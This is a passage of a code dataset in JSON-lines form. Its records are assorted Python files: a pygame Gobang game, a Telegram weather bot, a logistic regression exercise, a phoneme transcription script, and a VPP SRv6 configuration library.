delta*increaseTime\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"355930040","text":"# -*- coding: utf-8 -*-\nimport sys\nsys.dont_write_bytecode = True\ndef cmp_dict(src_data,dst_data):\n # 比较两个字典是否完全一致,若一致返回True\n flag = True\n if not (type(src_data) == type(dst_data)):\n flag = False\n else:\n if isinstance(src_data,dict):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for key in src_data:\n if not dst_data.has_key(key):\n flag = False\n break\n else:\n flag = (flag and cmp_dict(src_data[key],dst_data[key]))\n\n elif isinstance(src_data,list):\n if not (len(src_data) == len(dst_data)):\n flag = False\n else:\n for src_list, dst_list in zip(sorted(src_data), sorted(dst_data)):\n flag = (flag and cmp_dict(src_list, dst_list))\n if not flag:\n break\n else:\n if not (src_data == dst_data):\n flag = False\n return flag\n\ndef get_diff_keys(cover_keys,cmp_dict,current_dict):\n # 不同模型参数比较,参数相同的键放入same_keys中,不同的放入diff_keys,便于csv文件中参数顺序的排列\n cmp_keys = cmp_dict.keys()\n current_keys = current_dict.keys()\n diff_keys = []\n same_keys = []\n for key in cover_keys:\n if (key in cmp_keys) and (key in current_keys):\n if cmp_dict[key] == current_dict[key]:\n same_keys.append(key)\n else:\n diff_keys.append(key)\n else:\n diff_keys.append(key)\n return diff_keys,same_keys","sub_path":"remodet_repository_wdh_part/Projects/PyLib/Utils/dict.py","file_name":"dict.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"196153343","text":"# Name : Gobang game \n# Author : simon \n# e-mail : 2441873702@qq.com\n# Date : 2020.05.27 19:02\n# version: v3\n# http://www.pyinstaller.org/downloads.html\n# http://www.ico51.cn/ \n# bug 1 : 当鼠标点击到画布棋盘外仍可显示棋子 ———— fixed\n# bug 2 : 棋子会覆盖之前已经绘制的位置 ———— fixed\n# bug 3 : 棋子数量达到一定时,不会判定结果\n\n\nimport pygame\nimport pygame.freetype\n\n\n# fps setting\nfps = 300\n\n# default str value\nsize = width, height = 800, 600\nborder = 50 \nwlc_str = \"Welcom to gobang game!\"\nsuccessor = \"\"\n\n# default color\nbg_color = (128,138,135)\t#pygame.Color(\"white\")\nline_color = 0,0,0\n\n# chess color\nWHITE = 255,255,255\nBLACK = 0,0,0\nfont_color = 0,0,0\n\npygame.init()\nfclock = pygame.time.Clock()\n# pygame Surface\nscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\nbackground = pygame.Surface(screen.get_size())\ncaption = \"Gobang Game\"\npygame.display.set_caption(caption)\nicon = pygame.image.load('gobang_logo.png')\npygame.display.set_icon(icon)\n\n\ndef draw_font(background, string='Hello pygame!',font_size=20, positon=(0,0)):\n\t# font_type = pygame.freetype.Font('C://Windows//Fonts//msyh.ttc', 1)\n\tfont_type = pygame.freetype.Font('./consola.ttf', 1)\t\n\tfont_rect = font_type.render_to(background, positon, string, fgcolor=font_color, size=font_size)\n\tscreen.blit(background, (0, 0))\n\ndef draw_chessboard_rect(background, rect_point, border):\n\tx_num = int((width - 1.5 * border) / border)\n\ty_num = int((height - 1.5 * border) / border)\n\tfor num_w in range(x_num):\n\t\tfor num_h in range(y_num):\n\t\t\trect_point.append([num_w*border + 50, num_h*border + 50])\n\tfor item in rect_point:\n\t\ts_rect = item[0], item[1], border, border\n\t\tpygame.draw.rect(background, line_color, s_rect, 1)\n\treturn rect_point\n\ndef success(positon):\n\tfor item in positon:\n\t\t# 行\n\t\tif [item[0]+1,item[1]] in positon:\n\t\t\tif [item[0]+2,item[1]] in positon:\n\t\t\t\tif [item[0]+3,item[1]] in positon:\n\t\t\t\t\tif ([item[0]+4,item[1]] in positon):\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\t# 列\n\t\telif [item[0],item[1]+1] in positon:\n\t\t\tif [item[0],item[1]+2] in positon:\n\t\t\t\tif [item[0],item[1]+3] in positon:\n\t\t\t\t\tif [item[0],item[1]+4] in positon:\n\t\t\t\t\t\treturn True\n\t\t# 对角\n\t\telif [item[0]+1,item[1]+1] in positon:\n\t\t\tif [item[0]+2,item[1]+2] in positon:\n\t\t\t\tif [item[0]+3,item[1]+3] in positon:\n\t\t\t\t\tif [item[0]+4,item[1]+4] in positon:\n\t\t\t\t\t\t# print(\"success!\")\n\t\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef success_judge(chess_dict):\n\tblack_pos = []\n\twhite_pos = []\n\tglobal successor\n\t# print(chess_dict)\n\t# {'10,4': 2, '10,5': 1, '6,4': 2, '6,5': 1, '8,7': 2, '5,7': 1, '6,9': 2, '9,4': 1, '9,6': 2, '10,8': 1}\n\tfor item in chess_dict:\n\t\tx = item.split(\",\", 1)\n\t\tif chess_dict[item] == 1:\n\t\t\twhite_pos.append([int(x[0]),int(x[1])])\n\t\telse:\n\t\t\tblack_pos.append([int(x[0]),int(x[1])])\n\t\n\tprint(\"white_pos = \", white_pos)\n\tprint(\"black_pos = \", black_pos)\n\n\tif success(white_pos):\n\t\tsuccessor = \"white\"\n\t\treturn True\n\telif success(black_pos):\n\t\tsuccessor = \"black\"\n\t\treturn True\n\telse:\n\t\treturn False\n\"\"\"\n\t\tif success(white_pos):\n\t\t\tsuccessor = \"white\"\n\t\t\treturn True\n\t\t\tcontinue\n\t\telif success(black_pos):\n\t\t\tsuccessor = \"black\"\n\t\t\treturn True\n\t\t\tcontinue\n\"\"\"\n\ndef game_over(background, delay_time):\n\timport time,sys\n\tdraw_font(background, string=\"game over!\")\n\ttime.sleep(delay_time)\n\tsys.exit()\n\n\n# put chess down \ndef chess_down(background, position, color):\n\tpygame.draw.circle(background, color, position, 20, 0)\n\n\n\nmouse_pos = []\nblack_position = []\nwhite_position = []\nkey_flag = 0\nendflag = False\nwhile True:\n\t# event manage\n\tfor event in pygame.event.get():\n\t\t# quit\n\n\t\tif event.type == pygame.QUIT:\n\t\t\tgame_over(background, 0.3)\n\t\t\t\n\t\telif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_ESCAPE:\n\t\t\t\tgame_over(background, 0.1)\n\n\t\t# elif event.type == pygame.KEYDOWN:\n\t\t# \tif event.key == 'K_RETURN':\n\t\t# \t\tendflag = 0\n\t\t# window resize\n\t\telif event.type == pygame.VIDEORESIZE:\n\t\t\tsize = width, height = event.size[0], event.size[1]\n\t\t\tscreen = pygame.display.set_mode(size, pygame.RESIZABLE)\n\t\t\tbackground = pygame.Surface(screen.get_size())\n\t\telif endflag:\n\t\t\tcontinue\n\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\tmouse_pos.append([event.pos[0],event.pos[1]])\t# .pos --> tuple = (x_pos,y_pos)\n\n\trect_point = []\n\tbackground.fill(bg_color)\n\tdraw_chessboard_rect(background, rect_point, border)\n\tdraw_font(background, string=wlc_str)\n\n\tchess_dict = {}\n\tcount = 0\n\tfor position in mouse_pos:\n\t\t# position calculate:\n\t\tposition[0] = round(position[0] / 50) * 50\n\t\tposition[1] = round(position[1] / 50) * 50\n\n\t\tif (width//50 > round(position[0]/50) > 0) and (height//50 > round(position[1]//50) > 0):\n\t\t\tkey = str(position[0]//50)+\",\"+str(position[1]//50)\n\t\t\t# print(key)\n\t\t\t# flags \n\t\t\t# 0 -- no\n\t\t\t# 1 -- white\n\t\t\t# 2 -- black\n\n\t\t\tif key not in chess_dict:\n\t\t\t\tkey_flag = 1\n\t\t\t\t# flags = 0\n\t\t\t\tif count % 2 == 0:\n\t\t\t\t\tchess_color = BLACK\n\t\t\t\t\tflags = 2\n\t\t\t\telse:\n\t\t\t\t\tchess_color = WHITE\n\t\t\t\t\tflags = 1\n\t\t\t\tcount = count + 1\n\t\t\t\t# 归一化\n\t\t\t\tnew_dict = {key : flags}\n\t\t\t\tchess_dict.update(new_dict)\n\t\t\t\tchess_down(background, position, chess_color)\n\t\t\telse:\n\t\t\t\tkey_flag = 0\n\tprint(chess_dict)\n\tendflag = success_judge(chess_dict)\t# judgement advancement to fix bug 3\n\tif endflag:\n\t\tdraw_font(background, string=\"Congradulations! \"+successor+\" wins!\",font_size=20, positon=(300,20))\n\t\t# endflag = success_judge(chess_dict)\t\t# error bug 3\n\t# endflag = success_judge(chess_dict)\t\t\t# error bug 3\n\n\n\n\tscreen.blit(background, (0,0))\n\tfclock.tick(fps)\n\tpygame.display.update()\n\n","sub_path":"gobang/Gobang_v1.3.py","file_name":"Gobang_v1.3.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"248242750","text":"#using for test case when need . complete empty py.\n'''\nurl = \"http://zombie-bites.com/j/df\"\nprint(url.split(\"//\")[-1].split('www.')[-1].split('.')[0] )\n'''\ns='Hello world. ooo'\nprint(s.count('o'))\n\nprint(ord('a'), ord('b'))\nprint(ord('A'), ord('B'))\nlist =[1,2,3,4,8,6]\nlist.sort()\nprint(list)\ns1 ='one two three'\nlist = s1.split()\nprint(list)\nmax= 0\nfor c in list:\n if len(c)>max:\n max = len(c)\nfor c in range(len(list)-1,-1,-1):\n if len(list[c]) ==max:\n print(list[c])\n break\nprint(ord('a')-96)\n\nprint(ord('a'),ord('A'))","sub_path":"python/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"393983667","text":"from telegram.ext import Updater, CommandHandler, MessageHandler, Filters\r\nimport os\r\nimport requests\r\nfrom pymongo import MongoClient\r\n\r\nDARKSKY_TOKEN = os.environ.get(\"DARKSKY_API_KEY\")\r\nTELEGRAM_TOKEN = os.environ.get(\"BOT_KEY\")\r\nDB_NAME = os.environ.get(\"MONGO_DB\")\r\nPORT = os.environ.get(\"PORT\")\r\nrepo = MongoClient(os.environ.get(\"MONGODB_URI\"))\r\n\r\nos.system('python -m http.server {} &'.format(PORT))\r\n\r\nstartText = \"Olá eu sou o AtmoBot, existo para providenciar dados e informações sobre o local que você providenciar. Para usar apenas mande uma menssagem de localização com o local de procura.\"\r\n\r\nmessageFormat_br = \"\"\"> Informações Atuais:\r\n{sum}\r\nVento: {wind} m/s {wind_speed_warn_now}\r\nTemperatura: {temp} ºC \r\nHumidade: {umid} g/m³\r\nVisibilidade: {visi} km\r\nChuva: {rain} % de chance\r\n\r\n> Informações Dia:\r\n{sum_day}\r\nVento: {wind_day} m/s {wind_speed_warn_day}\r\nTemperatura Maxima: {temp_day} ºC \r\nHumidade: {umid_day} g/m³\r\nVisibilidade: {visi_day} km\r\nChuva: {rain_day} % de chance\r\n\r\nRestrições Aéreas:\r\n\t- \"\"\"\r\n\r\nmessageFormat_en = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} m/s {wind_speed_warn_now}\r\nTemperature: {temp} ºC \r\nHumidity: {umid} g/m³\r\nVisibility: {visi} km\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} m/s {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºC \r\nHumidity: {umid_day} g/m³\r\nVisibility: {visi_day} km\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\nmessageFormat_us = \"\"\"> Current Data:\r\n{sum}\r\nWind: {wind} mph {wind_speed_warn_now}\r\nTemperature: {temp} ºF \r\nHumidity: {umid} gr/ft3\r\nVisibility: {visi} miles\r\nRain: {rain} %\r\n\r\n> Day Data:\r\n{sum_day}\r\nWind: {wind_day} mph {wind_speed_warn_day}\r\nMax Temperature: {temp_day} ºF \r\nHumidity: {umid_day} gr/ft3\r\nVisibility: {visi_day} miles\r\nRain: {rain_day} %\r\n\r\nAerial Restriction:\r\n\t- \"\"\"\r\n\r\ndef start(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=startText)\r\n\r\ndef exit(update, context):\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Shutting Down...\")\r\n exit(9)\r\n raise SystemExit\r\n\r\nupdater = Updater(token=TELEGRAM_TOKEN, use_context=True)\r\ndispatcher = updater.dispatcher\r\nstart_handler = CommandHandler('start', start)\r\nexit_handler = CommandHandler('exit', exit)\r\ndispatcher.add_handler(start_handler)\r\ndispatcher.add_handler(exit_handler)\r\n\r\ndef lang(update, context):\r\n message = update.message\r\n if message.text == \"/lang\":\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"/lang {EN/PT/US}\")\r\n return\r\n if context.args[0].lower() == \"en\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'si'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to EN\")\r\n if context.args[0].lower() == \"us\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'en', 'units': 'us'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Set to US\")\r\n if context.args[0].lower() == \"pt\":\r\n repo[DB_NAME].users.update_one({'name': message.from_user.username},{'$set': {'name': message.from_user.username,'lang': 'pt', 'units': 'si'}}, upsert=True)\r\n context.bot.send_message(chat_id=update.message.chat_id, text=\"Em Português.\")\r\n\r\n\r\ndef location(update, context):\r\n message = update.message\r\n request_data = {\r\n 'api_key': DARKSKY_TOKEN,\r\n 'latitude': message.location.latitude,\r\n 'longitude': message.location.longitude\r\n }\r\n\r\n message_log = {\r\n 'user': message.from_user.username,\r\n 'timestamp': message.date.timestamp(),\r\n 'lat': message.location.latitude,\r\n 'lon': message.location.longitude\r\n }\r\n\r\n userData = repo[DB_NAME].users.find_one({'name': message.from_user.username})\r\n params_query = {'units':'si', 'lang': 'pt'} \r\n if userData:\r\n params_query= userData\r\n\r\n requestURL = \"https://api.darksky.net/forecast/{api_key}/{latitude},{longitude}\".format_map(request_data)\r\n print(requestURL)\r\n r = requests.get(requestURL, params=params_query)\r\n\t\r\n if r.status_code == 200:\r\n datanow = r.json()[\"currently\"]\r\n dataday = r.json()[\"daily\"][\"data\"]\r\n print(dataday[0])\r\n selectData = {\r\n 'sum': datanow[\"summary\"],\r\n 'temp': datanow[\"temperature\"],\r\n 'rain': datanow[\"precipProbability\"] * 100,\r\n 'umid': datanow[\"humidity\"],\r\n 'wind': datanow[\"windSpeed\"],\r\n 'visi': datanow[\"visibility\"],\r\n 'sum_day': dataday[0][\"summary\"],\r\n 'temp_day': dataday[0][\"temperatureHigh\"],\r\n 'rain_day': dataday[0][\"precipProbability\"] * 100,\r\n 'umid_day': dataday[0][\"humidity\"],\r\n 'wind_day': dataday[0][\"windSpeed\"],\r\n 'visi_day': dataday[0][\"visibility\"],\r\n \"wind_speed_warn_now\": \"\",\r\n \"wind_speed_warn_day\": \"\"\r\n }\r\n \r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'pt':\r\n c_mesg = messageFormat_br\r\n if userData[\"lang\"] == 'en':\r\n c_mesg = messageFormat_en\r\n if userData[\"units\"] == 'us':\r\n c_mesg = messageFormat_us \r\n \r\n if userData[\"units\"] == 'si':\r\n if int(selectData[\"wind\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 10:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n else:\r\n if int(selectData[\"wind\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_now\": \"\"})\r\n if int(selectData[\"wind_day\"]) >= 21:\r\n selectData.update({\"wind_speed_warn_day\": \"\"})\r\n \r\n context.bot.send_message(chat_id=update.message.chat_id, text=c_mesg.format_map(selectData))\r\n repo[DB_NAME].logs.insert_one(message_log)\r\n\t\r\nlocation_handler = MessageHandler(Filters.location, location)\r\ndispatcher.add_handler(location_handler)\r\n\r\nlang_handler = CommandHandler('lang', lang)\r\ndispatcher.add_handler(lang_handler)\r\n\r\nupdater.start_polling()\r\n\r\n\r\n","sub_path":"Atmobot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"29717732","text":"import os\n\ndocs = ['dev_guide', 'user_guide']\n\n\ndef test_that_docs_are_installed():\n for doc in docs:\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/pdf/{doc}.pdf'.format(\n doc=doc)), 'PDF for {doc} was not installed'.format(doc=doc)\n assert os.path.exists('/opt/venvs/zenterio-zk2/doc/{doc}/html/index.html'.format(\n doc=doc)), 'HTML for {doc} was not installed'.format(doc=doc)\n","sub_path":"k2/systest/debtest/doc.py","file_name":"doc.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"477739910","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport scipy\nfrom PIL import Image\nfrom scipy import ndimage\nfrom week2.lr_utils import load_dataset\n\n\ndef sigmoid(z):\n \"\"\"\n Compute the sigmoid of z\n\n Arguments:\n z -- A scalar or numpy array of any size.\n\n Return:\n s -- sigmoid(z)\n \"\"\"\n\n s = 1/(1 + np.exp(-z))\n return s\n\n\ndef initialize_with_zeros(dim):\n \"\"\"\n This function creates a vector of zeros of shape (dim, 1) for w and initializes b to 0.\n\n Argument:\n dim -- size of the w vector we want (or number of parameters in this case)\n\n Returns:\n w -- initialized vector of shape (dim, 1)\n b -- initialized scalar (corresponds to the bias)\n \"\"\"\n\n w = np.zeros((dim, 1))\n b = 0\n\n assert (w.shape == (dim, 1))\n assert (isinstance(b, float) or isinstance(b, int))\n\n return w, b\n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n\nm_train = train_set_y.shape[1] # 209 training examples\nm_test = test_set_y.shape[1] # 50 Testing examples\nnum_px = train_set_x_orig.shape[1] # 64 by 64 by 3\n\n### START CODE HERE ### (≈ 2 lines of code)\ntrain_set_x_flatten = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\ntest_set_x_flatten = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n### END CODE HERE ###\n\nprint(\"train_set_x_flatten shape: \" + str(train_set_x_flatten.shape))\nprint(\"train_set_y shape: \" + str(train_set_y.shape))\nprint(\"test_set_x_flatten shape: \" + str(test_set_x_flatten.shape))\nprint(\"test_set_y shape: \" + str(test_set_y.shape))\nprint(\"sanity check after reshaping: \" + str(train_set_x_flatten[0:5,0]))\nprint(\"sigmoid([0, 2]) = \" + str(sigmoid(np.array([0,2]))))\n\ndim = 2\nw, b = initialize_with_zeros(dim)\nprint (\"w = \" + str(w))\nprint (\"b = \" + str(b))\n\nprint('done')\n","sub_path":"week2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"338548993","text":"\n# coding: utf-8\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport cmudict\nimport nltk\n\nnltk.download('punkt')\nprondict = cmudict.dict()\ndir_path = os.path.abspath('.')\nexl_path = dir_path + r'/sum_100.csv'\nprint(exl_path)\ndf = pd.read_csv(exl_path,engine='python',keep_default_na=False)\n\nstr_list= []\npro_origin_list =[]\npro_result_list = []\nsame_list = []\nchar_rep_rate_list =[]\nchar_full_list = []\n\ndef split_tran(txt):\n txt_revise = txt.replace(\",\", '').replace(\".\", '')\n split_result = nltk.word_tokenize(txt_revise)\n for i in range(len(split_result)):\n split_result[i] = prondict[split_result[i].lower()]\n if split_result[i]:\n split_result[i] = split_result[i][0]\n return split_result\n\ndef list_str(list_tmp):\n result_str = \"\"\n for i in range(len(list_tmp)):\n str_tmp = [str(j) for j in list_tmp[i]]\n str_join_tmp = ' '.join(str_tmp)\n result_str = result_str + \" \" + str_join_tmp\n return result_str\n\nfor index, row in df.iterrows():\n list_origin = split_tran(row[\"Origin\"])\n list_result = split_tran(row[\"Result\"])\n\n pro_origin_list.append(list_str(list_origin))\n pro_result_list.append(list_str(list_result))\n # str_tmp = ''\n # if row[\"Origin\"] == row[\"Result\"]:\n # same_list.append(1)\n # else:\n # same_list.append(0)\n #\n # for i in row['Result']:\n # for j in row['Origin'].lower():\n # if i == j:\n # str_tmp = ''.join([str_tmp,i])\n # break\n # str_diff_tmp = ''.join([str_tmp,i])\n # # char_full_list.append(0)\n # # break\n # # print(str_tmp)\n # str_list.append(str_tmp)\n # if str_tmp == row['Result']:\n # char_full_list.append(1)\n # else:\n # char_full_list.append(0)\n # char_rep_rate = len(str_tmp.replace(\" \", \"\"))/len(str(row['origin']).replace(\" \", \"\"))\n # char_rep_rate_list.append(char_rep_rate)\ndf['pro_origin'] = pro_origin_list\ndf['pro_result'] = pro_result_list\n# df['same'] = same_list\n# df['align'] = str_list\n\n# same_number = len(df[df['same'].isin(1)])\n# df['char_rate'] = char_rep_rate_list\n# df['char_full'] = char_full_list\n\ndf.to_csv('result_100.csv')\n","sub_path":"code/process/pho_tran.py","file_name":"pho_tran.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"606662046","text":"# Copyright (c) 2017 Cisco and/or its affiliates.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Segment Routing over IPv6 dataplane utilities library.\"\"\"\n\nfrom enum import Enum\n\nfrom resources.libraries.python.VatExecutor import VatTerminal\nfrom resources.libraries.python.VatJsonUtil import VatJsonUtil\nfrom resources.libraries.python.topology import Topology\n\n\nclass SRv6Behaviour(Enum):\n \"\"\"Defines SRv6 endpoint functions implemented in VPP.\"\"\"\n # Endpoint function\n END = 'end'\n # Endpoint function with Layer-3 cross-connect\n END_X = 'end.x'\n # Endpoint with decapsulation and Layer-2 cross-connect\n END_DX2 = 'end.dx2'\n # Endpoint with decapsulation and IPv4 cross-connect\n END_DX4 = 'end.dx4'\n # Endpoint with decapsulation and IPv4 table lookup\n END_DT4 = 'end.dt4'\n # Endpoint with decapsulation and IPv6 cross-connect\n END_DX6 = 'end.dx6'\n # Endpoint with decapsulation and IPv6 table lookup\n END_DT6 = 'end.dt6'\n\n\nclass SRv6(object):\n \"\"\"SRv6 class.\"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def configure_sr_localsid(node, local_sid, behavior, interface=None,\n next_hop=None, fib_table=None):\n \"\"\"Create SRv6 LocalSID and binds it to a particular behaviour on\n the given node.\n\n :param node: Given node to create localSID on.\n :param local_sid: LocalSID IPv6 address.\n :param behavior: SRv6 LocalSID function.\n :param interface: Interface name (Optional, required for\n L2/L3 xconnects).\n :param next_hop: Next hop IPv4/IPv6 address (Optional, required for L3\n xconnects).\n :param fib_table: FIB table for IPv4/IPv6 lookup (Optional, required for\n L3 routing).\n :type node: dict\n :type local_sid: str\n :type behavior: str\n :type interface: str\n :type next_hop: int\n :type fib_table: str\n :raises ValueError: If unsupported SRv6 LocalSID function used or\n required parameter is missing.\n \"\"\"\n if behavior == SRv6Behaviour.END:\n params = ''\n elif behavior in [SRv6Behaviour.END_X, SRv6Behaviour.END_DX4,\n SRv6Behaviour.END_DX6]:\n if interface is None or next_hop is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'\n 'next_hop:{1}'.format(interface, next_hop))\n interface_name = Topology.get_interface_name(node, interface)\n params = '{0} {1}'.format(interface_name, next_hop)\n elif behavior == SRv6Behaviour.END_DX2:\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n params = '{0}'.format(interface)\n elif behavior in [SRv6Behaviour.END_DT4, SRv6Behaviour.END_DT6]:\n if fib_table is None:\n raise ValueError('Required data missing.\\nfib_table:{0}\\n'.\n format(fib_table))\n params = '{0}'.format(fib_table)\n else:\n raise ValueError('Unsupported SRv6 LocalSID function: {0}'.\n format(behavior))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_add.vat', local_sid=local_sid,\n behavior=behavior, params=params)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def delete_sr_localsid(node, local_sid):\n \"\"\"Delete SRv6 LocalSID on the given node.\n\n :param node: Given node to delete localSID on.\n :param local_sid: LocalSID IPv6 address.\n :type node: dict\n :type local_sid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsid_del.vat', local_sid=local_sid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 LocalSID {0} failed on node {1}'.format(\n local_sid, node['host']))\n\n @staticmethod\n def show_sr_localsids(node):\n \"\"\"Show SRv6 LocalSIDs on the given node.\n\n :param node: Given node to show localSIDs on.\n :type node: dict\n \"\"\"\n with VatTerminal(node) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_localsids_show.vat')\n\n @staticmethod\n def configure_sr_policy(node, bsid, sid_list, mode='encap'):\n \"\"\"Create SRv6 policy on the given node.\n\n :param node: Given node to create SRv6 policy on.\n :param bsid: BindingSID - local SID IPv6 address.\n :param sid_list: SID list.\n :param mode: Encapsulation / insertion mode.\n :type node: dict\n :type bsid: str\n :type sid_list: list\n :type mode: str\n \"\"\"\n sid_conf = 'next ' + ' next '.join(sid_list)\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_add.vat', bsid=bsid,\n sid_conf=sid_conf, mode=mode)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_policy(node, bsid):\n \"\"\"Delete SRv6 policy on the given node.\n\n :param node: Given node to delete SRv6 policy on.\n :param bsid: BindingSID IPv6 address.\n :type node: dict\n :type bsid: str\n \"\"\"\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policy_del.vat', bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Delete SRv6 policy for BindingSID {0} failed on node '\n '{1}'.format(bsid, node['host']))\n\n @staticmethod\n def show_sr_policies(node):\n \"\"\"Show SRv6 policies on the given node.\n\n :param node: Given node to show SRv6 policies on.\n :type node: dict\n \"\"\"\n with VatTerminal(node, json_param=False) as vat:\n vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_policies_show.vat')\n\n @staticmethod\n def configure_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Create SRv6 steering policy on the given node.\n\n :param node: Given node to create steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params = 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params = '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = vat.vat_terminal_exec_cmd_from_template(\n 'srv6/sr_steer_add_del.vat', params=params, bsid=bsid)\n\n VatJsonUtil.verify_vat_retval(\n resp[0],\n err_msg='Create SRv6 steering policy for BindingSID {0} failed on '\n 'node {1}'.format(bsid, node['host']))\n\n @staticmethod\n def delete_sr_steer(node, mode, bsid, interface=None, ip_addr=None,\n mask=None):\n \"\"\"Delete SRv6 steering policy on the given node.\n\n :param node: Given node to delete steering policy on.\n :param mode: Mode of operation - L2 or L3.\n :param bsid: BindingSID - local SID IPv6 address.\n :param interface: Interface name (Optional, required in case of\n L2 mode).\n :param ip_addr: IPv4/IPv6 address (Optional, required in case of L3\n mode).\n :param mask: IP address mask (Optional, required in case of L3 mode).\n :type node: dict\n :type mode: str\n :type bsid: str\n :type interface: str\n :type ip_addr: int\n :type mask: int\n :raises ValueError: If unsupported mode used or required parameter\n is missing.\n \"\"\"\n params = 'del'\n if mode == 'l2':\n if interface is None:\n raise ValueError('Required data missing.\\ninterface:{0}\\n'.\n format(interface))\n interface_name = Topology.get_interface_name(node, interface)\n params += 'l2 {0}'.format(interface_name)\n elif mode == 'l3':\n if ip_addr is None or mask is None:\n raise ValueError('Required data missing.\\nIP address:{0}\\n'\n 'mask:{1}'.format(ip_addr, mask))\n params += '{0}/{1}'.format(ip_addr, mask)\n else:\n raise ValueError('Unsupported mode: {0}'.format(mode))\n\n with VatTerminal(node) as vat:\n resp = 